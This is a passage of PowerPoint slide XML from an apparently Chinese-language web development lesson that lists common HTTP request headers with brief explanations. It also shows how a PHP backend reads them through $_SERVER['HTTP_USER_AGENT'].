                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>例子：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69852231-5B1F-9041-96E1-11B7B120D42A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="3368040"/>
            <a:ext cx="10043160" cy="1982530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后端获取请求头：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  加上  请求头字段的名字</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>例如对于上面的请求头，可以这样获取：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$_SERVER['HTTP_USER_AGENT']</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="240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401450054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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求包格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B752D-5167-E443-A63A-DC63C2717B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="921196"/>
            <a:ext cx="3810000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见请求头说明</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D41A972-4A6B-0B41-9349-7ECAC0CA3030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="1584960"/>
            <a:ext cx="5821680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求主机地址</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F519253D-1A71-1441-9890-F487AE61D142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="2087363"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Accept-Encoding:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器申明自己接收的编码方法，通常指定压缩方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FACF726-5532-CE41-8805-A72B38970282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="2589766"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Accept-Charset:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器申明自己接收的字符集 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57AD853-5E3D-AD49-A8D4-9D0CA3239326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3092169"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Cache-Control:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>页面缓存控制</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B228BAE9-B314-7F4D-A50B-C39867244FB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3594572"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>页面类型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB510D42-BA57-CD4F-B898-7A027D08E76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4096975"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>User-Agent:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器标识</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C2D0D2-D13C-984B-9926-62B9EFE32714}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="5101781"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Referer:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>来源页</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3A54EA-C964-F844-B12F-6A813950F080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="5604184"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF617F4-BA68-2D4D-AD02-260BEC0F3AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="6106587"/>
            <a:ext cx="10469880" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Connection:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是否保持连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
